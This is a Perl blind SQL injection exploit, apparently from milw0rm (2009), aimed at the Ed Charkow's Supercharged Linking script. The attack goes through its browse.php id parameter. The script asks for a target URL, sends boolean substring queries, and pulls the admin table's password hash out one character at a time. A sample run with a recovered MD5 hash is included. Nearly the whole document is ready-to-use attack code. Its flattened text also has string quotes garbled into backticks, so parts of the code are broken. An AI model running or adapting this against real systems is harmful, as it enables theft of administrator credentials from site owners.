Ed Charkow's Supercharged Linking Blind SQL Injection Exploit#!/usr/bin/perl #==========================================================================================# # # # [o] Ed Charkow's Supercharged Linking Blind SQL Injection Exploit # # Software : Ed Charkow's Supercharged Linking # # Buy Script : http://www.infodepot3000.com/Scripts/content/supercharged_linking.html # # Author : NoGe # # Contact : noge[dot]code[at]gmail[dot]com # # Blog : http://evilc0de.blogspot.com # # # # [o] Usage # # root@noge:~# perl link.pl # # # # [x]============================================================[x] # # | Ed Charkows Supercharged Linking Blind SQL Injection Exploit | # # | [F]ound by NoGe [C]oded by Vrs-hCk | # # [x]============================================================[x] # # # # [+] URL Path : www.target.com/[path] # # [+] Valid ID : 1 # # # # [!] Exploiting http://www.target.com/[path]/ ... # # # # [+] SELECT password FROM admin LIMIT 0,1 ... # # [+] md5@password> de9e3ae793d300ce7ee4742d4513cb06 # # # # [!] Exploit completed. # # # # root@noge:~# # # # # [o] Greetz # # MainHack BrotherHood [ http://mainhack.net ] # # Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang aJe # # H312Y yooogy mousekill }^-^{ loqsa zxvf martfella # # skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke # # # #==========================================================================================# use HTTP::Request; use LWP::UserAgent; $cmsapp = 'crotz'; $vuln = 'browse.php?id='; $table = 'admin'; $column = 'password'; $regexp = `No links for this category could be found`; $maxlen = 32; my $OS = `$^O`; if ($OS eq 'MSWin32') { system(`cls`); } else { system(`clear`); } printf `\n $cmsapp [x]============================================================[x] | Ed Charkows Supercharged Linking Blind SQL Injection Exploit | | [F]ound by NoGe [C]oded by Vrs-hCk | [x]============================================================[x] \n`; print `\n [+] URL Path : `; chomp($web=); print ` [+] Valid ID : `; chomp($id=); if ($web =~ /http:\/\// ) { $target = $web.`/`; } else { $target = `http://`.$web.`/`; } print `\n\n [!] Exploiting $target ...\n\n`; &get_data; print `\n\n [!] Exploit completed.\n\n`; sub get_data() { print ` [+] SELECT $column FROM $table LIMIT 0,1 ...\n`; syswrite(STDOUT, ` [+] md5\@password> `, 20); for (my $i=1; $i<=$maxlen; $i++) { my $chr = 0; my $found = 0; my $char = 48; while (!$chr && $char<=57) { if(exploit($i,$char) !~ /$regexp/) { $chr = 1; $found = 1; syswrite(STDOUT,chr($char),1); } else { $found = 0; } $char++; } if(!$chr) { $char = 97; while(!$chr && $char<=122) { if(exploit($i,$char) !~ /$regexp/) { $chr = 1; $found = 1; syswrite(STDOUT,chr($char),1); } else { $found = 0; } $char++; } } if (!$found) { print `\n\n [!] Exploit completed.\n\n`; exit; } } } sub exploit() { my $limit = $_[0]; my $chars = $_[1]; my $blind = '+and+substring((select+'.$column.'+from+'.$table.'+limit+0,1),'.$limit.',1)=char('.$chars.')'; my $inject = $target.$vuln.$id.$blind; my $content = get_content($inject); return $content; } sub get_content() { my $url = $_[0]; my $req = HTTP::Request->new(GET => $url); my $ua = LWP::UserAgent->new(); $ua->timeout(5); my $res = $ua->request($req); if ($res->is_error){ print `\n\n [!] Error, `.$res->status_line.`.\n\n`; exit; } return $res->content; } # milw0rm.com [2009-08-24]